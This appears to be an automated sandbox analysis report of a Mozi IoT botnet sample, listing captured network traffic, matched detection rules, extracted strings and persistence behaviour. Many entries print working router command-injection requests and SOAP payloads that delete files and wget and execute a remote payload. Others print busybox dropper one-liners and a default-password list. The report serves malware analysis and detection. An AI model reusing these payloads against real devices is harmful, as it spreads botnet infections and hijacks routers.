Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 83.142.198.185:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.12.89.25:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 184.25.176.127:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 200.123.205.169:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 34.98.66.83:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 45.144.3.201:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:

Spam, unwanted Advertisements and Ransom Demands

Source: /tmp/ZFvtIZszMd (PID: 5251)

HTML file containing JavaScript created: /usr/networks

Jump to dropped file

System Summary

Source: ZFvtIZszMd, type: SAMPLE	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5249.1.000000001a019d01.000000004a78c7a2.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5247.1.000000001a019d01.000000004a78c7a2.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5268.1.000000001a019d01.000000004a78c7a2.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: /usr/networks, type: DROPPED	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =

Source: Initial sample	Potential command found: GET /c HTTP/1.0
Source: Initial sample	Potential command found: GET %s HTTP/1.1
Source: Initial sample	Potential command found: GET /c
Source: Initial sample	Potential command found: GET /Mozi.6 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.7 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.c HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.m HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.x HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.a HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.s HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.r HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.b HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.4 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.k HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.l HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.p HTTP/1.0
Source: Initial sample	Potential command found: GET /%s HTTP/1.1
Source: Initial sample	Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample	Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample	Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
Source: Initial sample	Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
Source: Initial sample	Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
Source: Initial sample	Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron

Source: Initial sample	String containing potential weak password found: admin
Source: Initial sample	String containing potential weak password found: default
Source: Initial sample	String containing potential weak password found: support
Source: Initial sample	String containing potential weak password found: service
Source: Initial sample	String containing potential weak password found: supervisor
Source: Initial sample	String containing potential weak password found: guest
Source: Initial sample	String containing potential weak password found: administrator
Source: Initial sample	String containing potential weak password found: 123456
Source: Initial sample	String containing potential weak password found: 54321
Source: Initial sample	String containing potential weak password found: password
Source: Initial sample	String containing potential weak password found: 12345
Source: Initial sample	String containing potential weak password found: admin1234

Source: ELF static info symbol of initial sample

.symtab present: no

Source: Initial sample	String containing 'busybox' found: busybox
Source: Initial sample	String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
Source: Initial sample	String containing 'busybox' found: /bin/busybox cat /binols|head -n 1
Source: Initial sample	String containing 'busybox' found: "\x%82xsage:/bin/busybox cat /binols|head -n 1
Source: Initial sample	String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
Source: Initial sample	String containing 'busybox' found: /bin/busybox!cat obin/ls|more
Source: Initial sample	String containing 'busybox' found: dd bs=52 count=1(if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do$echo $i; done < /bin/busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox dd"bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
Source: Initial sample	String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
Source: Initial sample	String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample	String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>

Source: classification engine

Classification label: mal100.spre.troj.evad.lin@0/487@4/0

Persistence and Installation Behavior

Source: /tmp/ZFvtIZszMd (PID: 5251)

File: /etc/rcS.d/S95baby.sh

Jump to behavior

Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/profile.d/cedilla-portuguese.sh			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/profile.d/im-config_wayland.sh			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/profile.d/gawk.sh			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/profile.d/01-locale-fix.sh			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/profile.d/apps-bin-path.sh			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/profile.d/Z99-cloudinit-warnings.sh			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/profile.d/vte-2.91.sh			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/profile.d/Z97-byobu.sh			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/profile.d/Z99-cloud-locale-test.sh			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/profile.d/xdg_dirs_desktop_session.sh			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/profile.d/bash_completion.sh			Jump to behavior

Source: /tmp/ZFvtIZszMd (PID: 5251)

File: /proc/5251/mounts

Jump to behavior

Source: /bin/sh (PID: 5255)

Killall command executed: killall -9 telnetd utelnetd scfgmgr

Jump to behavior

Source: /tmp/ZFvtIZszMd (PID: 5251)

File written: /usr/networks

Jump to dropped file

Source: /tmp/ZFvtIZszMd (PID: 5251)	Shell script file created: /etc/rcS.d/S95baby.sh			Jump to dropped file
Source: /tmp/ZFvtIZszMd (PID: 5251)	Shell script file created: /etc/init.d/S95baby.sh			Jump to dropped file

Source: /tmp/ZFvtIZszMd (PID: 5264)

Reads from proc file: /proc/stat

Jump to behavior

Source: /usr/bin/killall (PID: 5255)	File opened: /proc/5141/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1582/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/3088/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/230/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/110/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/231/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/111/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/232/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1579/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/112/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/233/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1699/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/113/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/234/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1335/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1698/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/114/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/235/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1334/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1576/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/2302/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/115/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/236/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/116/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/237/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/117/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/118/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/910/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/119/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/912/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/10/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/2307/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/11/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/918/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/5030/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/12/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/13/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/14/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/15/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/5155/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/16/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/17/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/18/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1594/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/120/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/5150/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/121/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1349/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/122/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/243/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/123/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/2/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/124/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/3/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/4/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/125/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/126/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1344/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1465/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1586/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/127/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/6/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/248/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/128/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/249/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1463/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/800/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/9/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/801/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/20/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/21/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1900/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/22/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/23/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/24/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/25/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/26/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/27/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/28/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/29/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/491/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/250/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/130/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/251/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/252/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/132/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/253/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/254/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/255/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/256/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1599/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/257/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1477/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/379/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/258/stat			Jump to behavior
